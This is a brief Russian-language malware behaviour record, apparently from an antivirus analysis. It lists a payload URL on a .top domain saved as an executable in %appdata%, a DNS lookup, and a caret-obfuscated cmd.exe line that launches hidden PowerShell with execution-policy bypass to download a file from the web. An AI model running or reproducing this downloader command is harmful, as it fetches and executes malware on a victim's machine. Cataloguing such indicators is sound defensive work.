Техническая информация
- http://dosehoop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^We^R^SH^eL^L.^exE^ ^-E^x^ecU^T^I^oNpOL^i^cy^ BYPas^S -noProfi^l^E^ ^-W^i^ndO^wSt^y^l^E HI^d^DeN^ (new-^objECT S^ySt^e^M^.n^E^T.WEB^CLiENt)^.D^OwN^l^O^Adfi^lE^('http://d...
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /C "P^O^We^R^SH^eL^L.^exE^ ^-E^x^ecU^T^I^oNpOL^i^cy^ BYPas^S -noProfi^l^E^ ^-W^i^ndO^wSt^y^l^E HI^d^DeN^ (new-^objECT S^ySt^e^M^.n^E^T.WEB^CLiENt)^.D^OwN^l^O^Adfi^lE^('http://d...' (со скрытым окном)